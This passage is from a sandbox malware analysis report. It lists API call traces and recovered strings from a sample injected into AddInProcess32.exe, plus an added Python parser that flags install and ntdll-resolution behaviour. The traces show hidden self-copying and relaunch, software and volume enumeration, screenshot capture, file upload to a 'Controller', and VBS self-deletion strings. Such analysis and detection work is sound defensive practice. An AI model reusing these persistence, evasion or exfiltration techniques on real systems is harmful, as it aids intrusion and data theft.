• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
• GetProcAddress.KERNEL32(00000000), ref: 00406561
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                        • API String ID: 1646373207-4283035339
                                                                                                        • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                        • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                        • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                        • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 0040BC75
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                        • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                        • _wcslen.LIBCMT ref: 0040BD54
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                        • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000), ref: 0040BDF2
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                        • _wcslen.LIBCMT ref: 0040BE34
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                        • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                        • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$del$open$BG$BG
                                                                                                        • API String ID: 1579085052-2696236988
                                                                                                        • Opcode ID: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                                        • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                        • Opcode Fuzzy Hash: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                                        • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
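The two routines above, the ntdll export resolution at 004064F4-00406561 (RtlInitUnicodeString, NtAllocateVirtualMemory, NtFreeVirtualMemory, RtlAcquirePebLock, RtlReleasePebLock, LdrEnumerateLoadedModules looked up by GetModuleHandleW/GetProcAddress pairs) and the install routine at 0040BC75-0040BED0 (CreateDirectoryW, CopyFileW of AddInProcess32.exe, SetFileAttributesW with 00000007, ShellExecuteW "open", ExitProcess), are quicker to triage when the "APIs" bullets are parsed into a call sequence and checked against behavioural rules. The Python below is an added example, not part of the Joe Sandbox report and not Remcos code. Its sample input is copied verbatim from the two bullet lists above; the regex, the rule names and the attribute table are this example's own assumptions, with the constant meanings taken from the Windows SDK headers (FILE_ATTRIBUTE_READONLY|HIDDEN|SYSTEM = 0x7).

```python
"""Parse Joe Sandbox 'APIs' bullets into a call sequence and apply behavioural rules.
Added example, not from the report. Sample input is copied from the report's
function blocks at 004064F4-00406561 and 0040BC75-0040BED0; rule names, the
regex and the attribute table are this example's assumptions."""
from __future__ import annotations
import re
from dataclasses import dataclass

# One bullet per API call, in the three shapes the report uses:
#   • CopyFileW.KERNEL32(C:\...\AddInProcess32.exe,00000000,00000000), ref: 0040BDF2
#   • _wcslen.LIBCMT ref: 0040BC75
#   • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(...), ref: 0041AB5F
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-F]{8}))?")

# FILE_ATTRIBUTE_* bits (winnt.h) for SetFileAttributesW's dwFileAttributes argument.
FILE_ATTRIBUTES = {0x1: "READONLY", 0x2: "HIDDEN", 0x4: "SYSTEM", 0x20: "ARCHIVE", 0x80: "NORMAL"}

@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple[str, ...]
    ref: str                # call-site address ("ref:")
    subcall: str | None     # enclosing subcall function address, when the line names one

def parse_api_lines(text: str) -> list[ApiCall]:
    """API calls of one function block in report order; headings and non-bullets are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if m:
            args = tuple(a for a in (m.group("args") or "").split(",") if a)
            calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                 m.group("ref") or "", m.group("sub")))
    return calls

def decode_file_attributes(hex_value: str) -> list[str]:
    value = int(hex_value, 16)
    return [flag for bit, flag in FILE_ATTRIBUTES.items() if value & bit]

def ntdll_exports_resolved(calls: list[ApiCall]) -> list[str]:
    """Export names resolved from ntdll.dll by GetModuleHandleW directly followed by GetProcAddress.
    The sandbox prints stack slots past the real parameter, so the name sits after 'ntdll.dll'."""
    names = []
    for cur, nxt in zip(calls, calls[1:]):
        if (cur.name == "GetModuleHandleW" and len(cur.args) > 1
                and cur.args[0].lower() == "ntdll.dll" and nxt.name == "GetProcAddress"):
            names.append(cur.args[1])
    return names

def install_routine(calls: list[ApiCall]) -> dict:
    """Create a directory, copy a file there, set it hidden, launch it, exit: the install step."""
    names = {c.name for c in calls}
    attrs = [decode_file_attributes(c.args[1]) for c in calls
             if c.name == "SetFileAttributesW" and len(c.args) > 1]
    sources = sorted({c.args[0] for c in calls if c.name == "CopyFileW" and c.args})
    launches = any(c.name == "ShellExecuteW" and "open" in c.args for c in calls)
    hit = ({"CreateDirectoryW", "CopyFileW", "ExitProcess"} <= names
           and any("HIDDEN" in a for a in attrs) and launches)
    return {"hit": hit, "copied_from": sources, "attributes": attrs}

# Sample input copied from the report's bullet lists (the long first line is unchanged).
NTDLL_BLOCK = r"""APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
• GetProcAddress.KERNEL32(00000000), ref: 004064FD
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
• GetProcAddress.KERNEL32(00000000), ref: 00406511
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
• GetProcAddress.KERNEL32(00000000), ref: 00406525
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
• GetProcAddress.KERNEL32(00000000), ref: 00406539
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
• GetProcAddress.KERNEL32(00000000), ref: 0040654D
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
• GetProcAddress.KERNEL32(00000000), ref: 00406561
"""
INSTALL_BLOCK = r"""APIs
• _wcslen.LIBCMT ref: 0040BC75
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
• _wcslen.LIBCMT ref: 0040BD54
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000), ref: 0040BDF2
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
• _wcslen.LIBCMT ref: 0040BE34
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
• ExitProcess.KERNEL32 ref: 0040BED0
"""

if __name__ == "__main__":
    print(ntdll_exports_resolved(parse_api_lines(NTDLL_BLOCK)))
    print(install_routine(parse_api_lines(INSTALL_BLOCK)))
```

The rules are deliberately narrow: the install rule requires the hidden attribute plus a launch and an exit in the same function, so a plain file-copy helper does not fire, and the ntdll rule only counts a GetModuleHandleW whose next call is GetProcAddress, which is how the report presents each lookup. The same parser can be pointed at any other function block on this page; only the rule set needs to grow.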
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                        • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                        • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                        • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                        • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                        • GetLastError.KERNEL32 ref: 0041B313
                                                                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                        • GetLastError.KERNEL32 ref: 0041B370
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                        • String ID: ?
                                                                                                        • API String ID: 3941738427-1684325040
                                                                                                        • Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                        • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                        • Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                        • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                        • String ID:
                                                                                                        • API String ID: 3899193279-0
                                                                                                        • Opcode ID: 51f39d1eed0bb0b4e5b8ce655fdeab7d9d24a3419ebedca0ef41db0feeddc4a5
                                                                                                        • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                        • Opcode Fuzzy Hash: 51f39d1eed0bb0b4e5b8ce655fdeab7d9d24a3419ebedca0ef41db0feeddc4a5
                                                                                                        • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                          • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                        • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                        • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                        • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                        • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                        • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                        • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                        • API String ID: 1223786279-3931108886
                                                                                                        • Opcode ID: 951e407a7335b9e0a56f91841e3e4d0ffd1770d323d9a5522bd6a3f544b0dece
                                                                                                        • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                        • Opcode Fuzzy Hash: 951e407a7335b9e0a56f91841e3e4d0ffd1770d323d9a5522bd6a3f544b0dece
                                                                                                        • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                                        APIs
                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                        • API String ID: 2490988753-744132762
                                                                                                        • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                        • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                        • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                        • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnumOpen
                                                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                        • API String ID: 1332880857-3714951968
                                                                                                        • Opcode ID: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                                        • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                                        • Opcode Fuzzy Hash: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                                        • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                                        APIs
                                                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                        • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                        • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                        • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                        • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                        • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                        • String ID: Close
                                                                                                        • API String ID: 1657328048-3535843008
                                                                                                        • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                        • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                        • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                        • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$Info
                                                                                                        • String ID:
                                                                                                        • API String ID: 2509303402-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
• GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
• __aulldiv.LIBCMT ref: 00407FE9
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
• CloseHandle.KERNEL32(00000000), ref: 00408200
• CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
• CloseHandle.KERNEL32(00000000), ref: 00408256
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
• API String ID: 1884690901-3066803209
APIs
• ___free_lconv_mon.LIBCMT ref: 004500B1
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
• _free.LIBCMT ref: 004500A6
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 004500C8
• _free.LIBCMT ref: 004500DD
• _free.LIBCMT ref: 004500E8
• _free.LIBCMT ref: 0045010A
• _free.LIBCMT ref: 0045011D
• _free.LIBCMT ref: 0045012B
• _free.LIBCMT ref: 00450136
• _free.LIBCMT ref: 0045016E
• _free.LIBCMT ref: 00450175
• _free.LIBCMT ref: 00450192
• _free.LIBCMT ref: 004501AA
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
APIs
• __EH_prolog.LIBCMT ref: 0041912D
• GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
• Sleep.KERNEL32(000003E8), ref: 0041926D
• GetLocalTime.KERNEL32(?), ref: 0041927C
• Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
• String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
• API String ID: 489098229-65789007
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
• ExitProcess.KERNEL32 ref: 0040C832
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
• String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• API String ID: 1913171305-390638927
APIs
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
• SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
• CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
• closesocket.WS2_32(000000FF), ref: 0040481F
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
• SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
• CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
Memory Dump Source
• Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$ObjectSingleWait$closesocket
• String ID:
• API String ID: 3658366068-0
APIs
  • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
• GetLastError.KERNEL32 ref: 00454A96
• __dosmaperr.LIBCMT ref: 00454A9D
• GetFileType.KERNEL32(00000000), ref: 00454AA9
• GetLastError.KERNEL32 ref: 00454AB3
• __dosmaperr.LIBCMT ref: 00454ABC
• CloseHandle.KERNEL32(00000000), ref: 00454ADC
• CloseHandle.KERNEL32(?), ref: 00454C26
• GetLastError.KERNEL32 ref: 00454C58
• __dosmaperr.LIBCMT ref: 00454C5F
Strings
Memory Dump Source
